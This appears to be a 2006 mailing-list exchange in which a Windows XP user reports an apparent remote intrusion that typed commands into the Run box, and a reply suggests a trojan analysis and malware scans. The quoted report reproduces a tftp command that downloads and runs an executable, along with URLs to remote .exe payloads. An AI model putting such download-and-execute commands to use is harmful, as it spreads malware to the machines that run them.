On 10/5/06, Carey Fisher - NCS <careyfisher@ncsradio.com> wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?


Some variant of:

http://www.sophos.com/security/analyses/trojtofgerb.html ?

Try a free trial of PCdefense... http://www.laplink.com/pcdefense/

Run all the scans as you appear to be infected with something.

Orin.
-- 
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist